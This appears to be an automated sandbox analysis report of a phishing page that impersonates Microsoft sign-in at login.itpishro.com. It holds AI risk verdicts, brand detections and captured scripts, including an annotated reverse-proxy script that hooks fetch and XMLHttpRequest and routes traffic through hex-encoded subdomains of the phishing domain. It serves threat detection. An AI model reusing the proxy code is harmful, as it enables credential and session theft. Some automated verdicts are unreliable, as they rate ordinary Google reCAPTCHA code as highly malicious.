"reasoning": "The provided JavaScript snippet appears to be a minified and obfuscated code, which makes it difficult to analyze. However, based on the observed behaviors, it does not seem to contain any high-risk indicators such as dynamic code execution, data exfiltration, or redirects to malicious domains. The code appears to be related to some form of analytics or telemetry functionality, which is a relatively low-risk activity. While the use of legacy APIs like `XDomainRequest` and aggressive DOM manipulation are present, these are considered low-risk indicators. Overall, the risk score is assessed as 3, indicating a low-risk script that may require further review but does not demonstrate clear malicious intent."
} |
/* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */ (function(){var E=this||self,e=function(q,b){if(b=(q=null,E).trustedTypes,!b||!b.createPolicy)return q;try{q=b.createPolicy("bg",{createHTML:T,createScript:T,createScriptURL:T})}catch(v){E.console&&E.console.error(v.message)}return q},T=function(q){return q};(0,eval)(function(q,b){return(b=e())&&q.eval(b.createScript("1"))===1?function(v){return b.createScript(v)}:function(v){return""+v}}(E)(Array(Math.random()*7824|0).join("\n")+['(function(){/*',
'',
' Copyright Google LLC',
' SPDX-License-Identifier: Apache-2.0',
'*/',
'var S=function(b,q,v,T,e,G,d,c){if(!q.uF&&(d=void 0,v&&v[0]===O&&(b=v[1],d=v[2],v=void 0),G=l(q,354),G.length==0&&(e=l(q,416)>>3,G.push(b,e>>8&255,e&255),d!=void 0&&G.push(d&255)),b="",v&&(v.message&&(b+=v.message),v.stack&&(b+=":"+v.stack)),v=l(q,28),v[0]>3)){q.C=(v=(v[0]-=(b=b.slice(0,(v[0]|0)-3),(b.length|0)+3),b=qE(b),q.C),q);try{q.H8?(T=(T=l(q,462))&&T[T.length-1]||95,(c=l(q,33))&&c[c.length-1]==T||H([T&255],q,33)):H([95],q,462),H(g(2,b.length).concat(b),q,258,9)}finally{q.C=v}}},Ep=function(b,q,v,T,e){function G(){}return{invoke:function(d,c,P,E){function Y(){v(function(f){v9(function(){d(f)})},P)}if(!c)return c=e(P),d&&d(c),c;v?Y():(E=G,G=function(){v9((E(),Y))})},pe:(T=(e=(b=b9(b,function(d){G&&(q&&v9(q),v=d,G(),G=void 0)},(v=void 0,!!q)),b[0]),b[1]),function(d){T&&T(d)})}},TC=function(b,q){function v(){this.S=(this.n=0,[])}return[function(T){b.G6(T),q.G6(T)},(q=new (v.prototype.E_=(v.prototype.G6=function(T,e){this.S.length<(this.n++,50)?this.S.push(T):(e=Math.floor(Math.random()*this.n),e<50&&(this.S[e]=T))},function(){if(this.n===0)return[0,0];return[(this.S.sort(function(T,e){return T-e}),this.n),this.S[this.S.length>>1]]}),b=new v,v),function(T){return q=(T=b.E_().concat(q.E_()),new v),T})]},Z,YY=function(b){return b},f4=function(b,q){return b[q]<<24|b[(q|0)+1]<<16|b[(q|0)+2]<<8|b[(q|0)+3]},W=function(b,q,v,T,e,G){if(b.Z.length){b.mR=(b.g=!(b.g&&":TQR:TQR:"(),0),v);try{e=b.X(),b.U=e,b.A=0,b.O=0,b.v=e,T=GC(v,b),q=q?0:10,G=b.X()-b.v,b.e6+=G,b.Z2&&b.Z2(G-b.u,b.N,b.L,b.O),b.u=0,b.L=false,b.N=false,G<q||b.W8--<=0||(G=Math.floor(G),b.CU.push(G<=254?G:254))}finally{b.g=false}return T}},NE=function(b,q){return 
X[q](X.prototype,{floor:b,propertyIsEnumerable:b,parent:b,replace:b,pop:b,console:b,splice:b,call:b,stack:b,document:b,prototype:b,length:b})},a=this||self,J=function(b,q,v){if(b==246||b==416)q.I[b]?q.I[b].concat(v):q.I[b]=Op(v,q);else{if(q.uF&&b!=278)return;b==214||b==258||b==454||b==290||b==354||b==462||b==33||b==172||b==221||b==28?q.I[b]||(q.I[b]=QP(v,86,b,q)):q.I[b]=QP(v,105,b,q)}b==278&&(q.Y=w(false,q,32),q.J=void 0)},z=function(b,q,v,T,e,G,d){d=this;try{l9(G,this,e,v,q,T,b)}catch(c){t(c,this),T(function(P){P(d.H)})}},l=function(b,q){if(b=b.I[q],b===void 0)throw[O,30,q];if(b.value)return b.create();return b.create(q*5*q+-18*q+86),b.prototype},Sk=function(b,q,v,T,e){if(e=b[0],e==c9)q.L=true,q.W8=25,q.i(b);else if(e==D){T=b[1];try{v=q.H||q.i(b)}catch(G){t(G,q),v=q.H}b=q.X(),T(v),q.u+=q.X()-b}else if(e==Ay)b[3]&&(q.N=true),b[4]&&(q.L=true),q.i(b);else if(e==H9)q.N=true,q.i(b);else if(e==P9){try{for(v=0;v<q.s.length;v++)try{T=q.s[v],T[0][T[1]](T[2])}catch(G){}}catch(G){}((0,b[1])(function(G,d){q.IF(G,true,d)},(q.s=[],v=q.X(),function(G){n([go],(G=!q.Z.length,q)),G&&W(q,false,true)}),function(G){return q.Xh(G)},function(G,d){return q.t9(G,d)}),q).u+=q.X()-v}else{if(e==hy)return v=b[2],J(461,q,b[6]),J(6,q,v),q.i(b);e==go?(q.I=null,q.T=[],q.CU=[]):e==yP&&a.document.readyState==="loading"&&(q.K=function(G,d){function c(){d||(d=true,G())}(a.document.addEventListener("DOMContentLoaded",c,(d=false,F)),a).addEventListener("load",c,F)})}},w=function(b,q,v,T,e,G,d,c,P,E,Y,f,N,Q){if((c=l(q,246),c)>=q.D)throw[O,31];for(f=(Q=v,(T=0,q.c8).length),E=c;Q>0;)Y=E>>3,e=E%8,d=q.T[Y],N=8-(e|0),N=N<Q?N:Q,b&&(G=q,G.J!=E>>6&&(G.J=E>>6,P=l(G,278),G.P8=Zs(G.J,G.Y,[0,0,P[1],P[2]])),d^=q.P8[Y&f]),T|=(d>>8-(e|0)-(N|0)&(1<<N)-1)<<(Q|0)-(N|0) |
URL: https://www.google.com/recaptcha/api2/anchor?ar=1&... Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of the `recaptcha.anchor.Main.init()` function with encoded parameters suggests the potential for malicious activity. Additionally, the script interacts with an unknown domain (`www.google.com/js/bg/FsaNIYyPN76i0sL7d3myIoFfjMDAw8eHc9AJuLUrm7A.js`), which further increases the risk. Overall, this script demonstrates a high level of suspicion and should be thoroughly investigated."
} |
recaptcha.anchor.Main.init("[\x22ainput\x22,[\x22bgdata\x22,\x22Ly93d3cuZ29vZ2xlLmNvbS9qcy9iZy9Gc2FOSVl5UE43Nmkwc0w3ZDNteUlvRmZqTURBdzhlSGM5QUp1TFVybTdBLmpz\x22,\x22\x22,\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 |
URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verifying...",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
|
URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verifying...",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
|
URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"brands": [
"Microsoft",
"Cloudflare"
]
} |
|
URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"brands": [
"Microsoft",
"Cloudflare"
]
} |
|
URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verify you are human",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
|
URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verifying...",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
|
URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Success!",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
|
URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"brands": [
"Microsoft",
"Cloudflare"
]
} |
|
URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
URL: https://login.itpishro.com/ Model: Joe Sandbox AI | { "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is classified as 'wellknown'.", "The URL 'login.itpishro.com' does not match the legitimate domain 'microsoft.com'.", "The domain 'itpishro.com' does not have any known association with Microsoft.", "The presence of 'login' as a subdomain is a common tactic used in phishing to mimic legitimate login pages.", "The domain name 'itpishro.com' is not a recognized Microsoft domain and could be suspicious." ], "riskscore": 9}
Google indexed: False |
URL: login.itpishro.com
Brands: Microsoft
Input Fields: unknown |
URL: https://login.itpishro.com/?login_hint=billg@micro... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "This script exhibits several high-risk behaviors, including data exfiltration, obfuscated code/URLs, and redirects to suspicious domains. While some contextual factors like the use of trusted domains and analytics-like functionality may suggest legitimate intent, the overall aggressive and opaque nature of the script raises significant security concerns. Further investigation is warranted to determine the true purpose and potential risks."
} |
//<![CDATA[
$Config={"iMaxStackForKnockoutAsyncComponents":10000,"fShowButtons":true,"urlCdn":"https://61616463646e2e6d736674617574682e6e6574.itpishro.com/shared/1.0/","urlDefaultFavicon":"https://61616463646e2e6d736674617574682e6e6574.itpishro.com/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico","urlPost":"/login.srf?login_hint=billg%40microsoft.com\u0026client-request-id=efb7e3d4-abef-4708-9230-f206ec262df9\u0026sso_reload=True","iPawnIcon":0,"sPOST_Username":"","sFTName":"flowToken","fEnableOneDSClientTelemetry":true,"urlReportPageLoad":"https://login.itpishro.com/common/instrumentation/reportpageload?mkt=en-US","dynamicTenantBranding":null,"staticTenantBranding":null,"oAppCobranding":{},"iBackgroundImage":2,"fApplicationInsightsEnabled":false,"iApplicationInsightsEnabledPercentage":0,"urlSetDebugMode":"https://login.itpishro.com/common/debugmode","fEnableCssAnimation":true,"fAllowGrayOutLightBox":true,"fUseMsaSessionState":true,"fIsRemoteNGCSupported":true,"desktopSsoConfig":{"isEdgeAnaheimAllowed":true,"iwaEndpointUrlFormat":"https://6175746f6c6f676f6e2e6d6963726f736f6674617a75726561642d73736f2e636f6d.itpishro.com/{0}/winauth/sso?client-request-id=efb7e3d4-abef-4708-9230-f206ec262df9","iwaSsoProbeUrlFormat":"https://6175746f6c6f676f6e2e6d6963726f736f6674617a75726561642d73736f2e636f6d.itpishro.com/{0}/winauth/ssoprobe?client-request-id=efb7e3d4-abef-4708-9230-f206ec262df9","iwaIFrameUrlFormat":"https://6175746f6c6f676f6e2e6d6963726f736f6674617a75726561642d73736f2e636f6d.itpishro.com/{0}/winauth/iframe?client-request-id=efb7e3d4-abef-4708-9230-f206ec262df9\u0026isAdalRequest=False","iwaRequestTimeoutInMs":10000,"startDesktopSsoOnPageLoad":false,"progressAnimationTimeout":10000,"isEdgeAllowed":false,"minDssoEdgeVersion":"17","isSafariAllowed":true,"redirectUri":"","isIEAllowedForSsoProbe":true,"edgeRedirectUri":"https://6175746f6c6f676f6e2e6d6963726f736f6674617a75726561642d73736f2e636f6d.itpishro.com/common/winauth/sso/edgeredirect?client-request-id=efb7e3d4-a
bef-4708-9230-f206ec262df9\u0026origin=login.microsoftonline.com\u0026is_redirected=1","isFlowTokenPassedInEdge":true},"iSessionPullType":2,"fUseSameSite":true,"isGlobalTenant":true,"uiflavor":1001,"fOfflineAccountVisible":false,"fEnableUserStateFix":true,"fShowAccessPassPeek":true,"fUpdateSessionPollingLogic":true,"fEnableShowPickerCredObservable":true,"fFetchSessionsSkipDsso":true,"fUseNonMicrosoftDefaultBrandingForCiam":true,"fRemoveCustomCss":true,"fFixUICrashForApiRequestHandler":true,"fShowUpdatedKoreanPrivacyFooter":true,"fUsePostCssHotfix":true,"fFixUserFlowBranding":true,"fEnablePasskeyNullFix":true,"fEnableRefreshCookiesFix":true,"scid":2001,"hpgact":2101,"hpgid":6,"apiCanary":"PAQABDgEAAADW6jl31mB3T7ugrWTT8pFezS03eppXDJapxkhHDljTuH7hbmL5bIWGrmiNeoLL8A6DdXKyBcwLJiR38SRDpcmMeXDyx-TjWq-AeXDX-tk8Bw3F7qdWhYwAAVTfj45K1GT0_5Ni0Ch9mgV1bQlfR0ENphoN5iFwnDqGTeLN9RGc1JXcrNWnARjMbUuluuhxtl1J5_n4Z5Q1nGIoSHjaUd5ILWqSlUJo8KZuQgA4g8uGZSAA","canary":"qUV8jJIY4JdiJsq8jUURWfGnrZS1LoQtM2sx1+EI6IY=6:1:CANARY:61/9XI3fvdb4FX216jL9nMYk3+uQOLYSs9EeHxo9T0s=","sCanaryTokenName":"canary","fSkipRenderingNewCanaryToken":false,"fEnableNewCsrfProtection":true,"correlationId":"efb7e3d4-abef-4708-9230-f206ec262df9","sessionId":"4dcfd241-fa19-424f-b737-f937cedc3c00","locale":{"mkt":"en-US","lcid":1033},"slMaxRetry":2,"slReportFailure":true,"strings":{"desktopsso":{"authenticatingmessage":"Trying to sign you in"}},"enums":{"ClientMetricsModes":{"None":0,"SubmitOnPost":1,"SubmitOnRedirect":2,"InstrumentPlt":4}},"urls":{"instr":{"pageload":"https://login.itpishro.com/common/instrumentation/reportpageload","dssostatus":"https://login.itpishro.com/common/instrumentation/dssostatus"}},"browser":{"ltr":1,"Chrome":1,"_Win":1,"_M117":1,"_D0":1,"Full":1,"Win81":1,"RE_WebKit":1,"b":{"name":"Chrome","major":117,"minor":0},"os":{"name":"Windows","version":"10.0"},"V":"117.0"},"watson":{"url":"/common/handlers/watson","bundle":"https://61616463646e2e6d736674617574682e6e6574.itpishro.com/ests/2.1/ |
URL: https://login.itpishro.com/?login_hint=billg@micro... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The provided JavaScript snippet exhibits several behaviors that raise moderate security concerns. It includes dynamic code manipulation, data exfiltration, and URL obfuscation, which are considered moderate-risk indicators. However, the script also appears to have some legitimate functionality, such as cookie handling and URL patching, which mitigates the overall risk. Further review may be necessary to determine the full context and intent of the script."
} |
// Captured page script from the analysed site; analysis comments added, code unchanged.
// What the code shows: it keeps the page's network traffic on the proxy domain.
// fetch() targets whose host is not already under "itpishro.com" are rewritten to
// <hex(host)>.itpishro.com, and every XMLHttpRequest carries a custom "vfff9080"
// header whose value is read from the cookie of the same name.
// Detection hint: a long hex-only DNS label that decodes to a well-known sign-in
// host, sitting under an unrelated registrable domain, plus the unusual header name.
(function(){
// Parses a URL by assigning it to a detached <a> element; callers read .hostname.
var getLocation = function(href) {
var l = document.createElement("a");
l.href = href;
return l;
};
// Hex-encodes a string one UTF-16 code unit at a time (no zero padding).
// The hex labels elsewhere in this report decode the same way, e.g.
// 6d7366742e7374732e6d6963726f736f66742e636f6d -> msft.sts.microsoft.com
// 61616463646e2e6d736674617574682e6e6574 -> aadcdn.msftauth.net
function encoderSub(str) {
var hex = '';
for(var i=0;i<str.length;i++) {
hex += ''+str.charCodeAt(i).toString(16);
}
return hex;
}
// Maps an original host to its proxied form: unchanged if it already contains
// baseurl (substring match, not a suffix match), otherwise "<hex(host)>.<baseurl>".
function setUrl(baseurl,host){
if(host.includes(baseurl)){
return host;
}
// dash_url is assigned without a declaration, so it is an implicit global.
dash_url = encoderSub(host);
return dash_url + "." + baseurl;
}
// Rewrites an absolute URL so that its host becomes a subdomain of the proxy domain.
// Only the literal prefix "https://" + hostname is replaced (first occurrence);
// URLs already on the proxy domain are returned untouched.
function patch(url){
// baseUrl and urlparts are also implicit globals (no var/let/const).
baseUrl = "itpishro.com";
urlparts = getLocation(url);
if(urlparts.hostname.includes(baseUrl)){
return url;
}
return url.replace("https://"+urlparts.hostname,location.protocol + "//"+setUrl(baseUrl,urlparts.hostname));
}
// Returns the value of the named cookie from document.cookie, or "" if absent.
function getCookie(cname) {
let name = cname + "=";
let decodedCookie = decodeURIComponent(document.cookie);
let ca = decodedCookie.split(';');
for(let i = 0; i <ca.length; i++) {
let c = ca[i];
// strip leading spaces left over from the "; " separator
while (c.charAt(0) == ' ') {
c = c.substring(1);
}
if (c.indexOf(name) == 0) {
return c.substring(name.length, c.length);
}
}
return "";
}
// Hook 1: wrap XMLHttpRequest.prototype.send so every XHR sent by the page gets
// the "vfff9080" header set from the cookie of the same name before the original
// send runs. NOTE(analysis): presumably a session/victim identifier consumed by
// the proxy backend — the code shown does not establish its meaning.
var pSend = window.XMLHttpRequest.prototype.send;
window.XMLHttpRequest.prototype.send = function() {
//add cookies
this.setRequestHeader("vfff9080", getCookie("vfff9080"));
return pSend.apply(this, [].slice.call(arguments));
};
// Hook 2: wrap window.fetch so the request URL is passed through patch() first.
const constantMock = window.fetch;
window.fetch = function() {
// Leaves a console trace ("string" / "object") on every fetch call.
console.log(typeof arguments[0]);
if(typeof arguments[0] == "object"){
// Object argument (e.g. a Request): rebuild it with the rewritten URL.
arguments[0] = new Request(patch(arguments[0].url),arguments[0]);
// console.log(arguments[0]);
}
else{
// Otherwise the first argument is treated as a URL string.
arguments[0] = patch(arguments[0]);
}
// Calls the saved original fetch with the rewritten arguments and relays the result.
return new Promise((resolve, reject) => {
constantMock
.apply(this, arguments)
.then((response) => {
resolve(response);
})
.catch((error) => {
// NOTE(analysis): `response` is not bound in this callback (the parameter is `error`).
reject(response);
})
});
}
})();
|
URL: https://login.itpishro.com/?login_hint=billg@micro... Model: Joe Sandbox AI |
{
"risk_score": 3,
"reasoning": "The script contains legacy practices and tracking behavior, such as logging and event registration, but does not exhibit high-risk behaviors like dynamic code execution or data exfiltration. The script appears to be part of a debugging or logging framework, with no clear malicious intent."
} |
//<![CDATA[
!function(){var e=window,r=e.$Debug=e.$Debug||{},t=e.$Config||{};if(!r.appendLog){var n=[],o=0;r.appendLog=function(e){var r=t.maxDebugLog||25,i=(new Date).toUTCString()+":"+e;n.push(o+":"+i),n.length>r&&n.shift(),o++},r.getLogs=function(){return n}}}(),function(){function e(e,r){function t(i){var a=e[i];if(i<n-1){return void(o.r[a]?t(i+1):o.when(a,function(){t(i+1)}))}r(a)}var n=e.length;t(0)}function r(e,r,i){function a(){var e=!!s.method,o=e?s.method:i[0],a=s.extraArgs||[],u=n.$WebWatson;try{
var c=t(i,!e);if(a&&a.length>0){for(var d=a.length,l=0;l<d;l++){c.push(a[l])}}o.apply(r,c)}catch(e){return void(u&&u.submitFromException&&u.submitFromException(e))}}var s=o.r&&o.r[e];return r=r||this,s&&(s.skipTimeout?a():n.setTimeout(a,0)),s}function t(e,r){return Array.prototype.slice.call(e,r?1:0)}var n=window;n.$Do||(n.$Do={"q":[],"r":[],"removeItems":[],"lock":0,"o":[]});var o=n.$Do;o.when=function(t,n){function i(e){r(e,a,s)||o.q.push({"id":e,"c":a,"a":s})}var a=0,s=[],u=1;"function"==typeof n||(a=n,
u=2);for(var c=u;c<arguments.length;c++){s.push(arguments[c])}t instanceof Array?e(t,i):i(t)},o.register=function(e,t,n){if(!o.r[e]){o.o.push(e);var i={};if(t&&(i.method=t),n&&(i.skipTimeout=n),arguments&&arguments.length>3){i.extraArgs=[];for(var a=3;a<arguments.length;a++){i.extraArgs.push(arguments[a])}}o.r[e]=i,o.lock++;try{for(var s=0;s<o.q.length;s++){var u=o.q[s];u.id==e&&r(e,u.c,u.a)&&o.removeItems.push(u)}}catch(e){throw e}finally{if(0===--o.lock){for(var c=0;c<o.removeItems.length;c++){
for(var d=o.removeItems[c],l=0;l<o.q.length;l++){if(o.q[l]===d){o.q.splice(l,1);break}}}o.removeItems=[]}}}},o.unregister=function(e){o.r[e]&&delete o.r[e]}}(),function(e,r){function t(){if(!a){if(!r.body){return void setTimeout(t)}a=!0,e.$Do.register("doc.ready",0,!0)}}function n(){if(!s){if(!r.body){return void setTimeout(n)}t(),s=!0,e.$Do.register("doc.load",0,!0),i()}}function o(e){(r.addEventListener||"load"===e.type||"complete"===r.readyState)&&t()}function i(){
r.addEventListener?(r.removeEventListener("DOMContentLoaded",o,!1),e.removeEventListener("load",n,!1)):r.attachEvent&&(r.detachEvent("onreadystatechange",o),e.detachEvent("onload",n))}var a=!1,s=!1;if("complete"===r.readyState){return void setTimeout(n)}!function(){r.addEventListener?(r.addEventListener("DOMContentLoaded",o,!1),e.addEventListener("load",n,!1)):r.attachEvent&&(r.attachEvent("onreadystatechange",o),e.attachEvent("onload",n))}()}(window,document),function(){function e(){
return f.$Config||f.ServerData||{}}function r(e,r){var t=f.$Debug;t&&t.appendLog&&(r&&(e+=" '"+(r.src||r.href||"")+"'",e+=", id:"+(r.id||""),e+=", async:"+(r.async||""),e+=", defer:"+(r.defer||"")),t.appendLog(e))}function t(){var e=f.$B;if(void 0===d){if(e){d=e.IE}else{var r=f.navigator.userAgent;d=-1!==r.indexOf("MSIE ")||-1!==r.indexOf("Trident/")}}return d}function n(){var e=f.$B;if(void 0===l){if(e){l=e.RE_Edge}else{var r=f.navigator.userAgent;l=-1!==r.indexOf("Edge")}}return l}function o(e){
var r=e.indexOf("?"),t=r>-1?r:e.length,n=e.lastIndexOf(".",t);return e.substring(n,n+h.length).toLowerCase()===h}function i(){var r=e();return(r.loader||{}).slReportFailure||r.slReportFailure||!1}function a(){return(e().loader||{}).redirectToErrorPageOnLoadFailure||!1}function s(){return(e().loader||{}).logByThrowing||!1}function u(e){if(!t()&&!n()){return!1}var r=e.src||e.href||"";if(!r){return!0}if(o(r)){var i,a,s;try{i=e.sheet,a=i&&i.cssRules,s=!1}catch(e){s=!0}if(i&&!a&&s){return!0}
if(i&&a&&0===a.length){return!0}}return!1}function c(){function t(e){g.getElementsByTagName("head")[0].appendChild(e)}function n(e,r,t,n){var u=null;return u=o(e)?i(e):"script"===n.toLowerCase()?a(e):s(e,n),r&&(u.id=r),"function"==typeof u.setAttribute&&(u.setAttribute("rickorigin","anonymous"),t&&"string"==typeof t&&u.setAttribute("xintegrity",t)),u}function i(e){var r=g.createElement("link");return r.rel="stylesheet",r.type="text/css",r.href=e,r}function a(e){
var r=g.createElement("script"),t=g.querySelector("s |
URL: https://6d7366742e7374732e6d6963726f736f66742e636f6d.itpishro.com/adfs/ls/?login_hint=billg%40microsoft.com&client-request-id=f5acd101-dfbb-4fdd-8a12-aa6a66d0a51c&username=billg%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3Afederation%3AMicrosoftOnline&wctx Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Sign in with PIN or smartcard",
"prominent_button_name": "unknown",
"text_input_field_labels": [
"Password"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
|
URL: https://6d7366742e7374732e6d6963726f736f66742e636f6d.itpishro.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": true,
"malicious_keywords": false,
"encoded_characters": true,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": true,
"third_party_hosting": true
} |
URL: https://6d7366742e7374732e6d6963726f736f66742e636f6d.itpishro.com |
URL: https://6d7366742e7374732e6d6963726f736f66742e636f6d.itpishro.com/adfs/ls/?login_hint=billg%40microsoft.com&client-request-id=f5acd101-dfbb-4fdd-8a12-aa6a66d0a51c&username=billg%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3Afederation%3AMicrosoftOnline&wctx Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
URL: https://6d7366742e7374732e6d6963726f736f66742e636f6d.itpishro.com/adfs/ls/?login_hint=billg%40microsoft.com&client-request-id=f5acd101-dfbb-4fdd-8a12-aa6a66d0a51c&username=billg%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3Afederation%3AMicrosoftOnline&wctx Model: Joe Sandbox AI | { "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is classified as 'wellknown'.", "The legitimate domain for Microsoft is 'microsoft.com'.", "The provided URL '6d7366742e7374732e6d6963726f736f66742e636f6d.itpishro.com' does not match the legitimate domain.", "The URL contains a suspicious subdomain structure and an unrelated domain 'itpishro.com'.", "The presence of a password input field on a non-legitimate domain is a common phishing tactic." ], "riskscore": 9}
Google indexed: False |
URL: 6d7366742e7374732e6d6963726f736f66742e636f6d.itpishro.com
Brands: Microsoft
Input Fields: Password |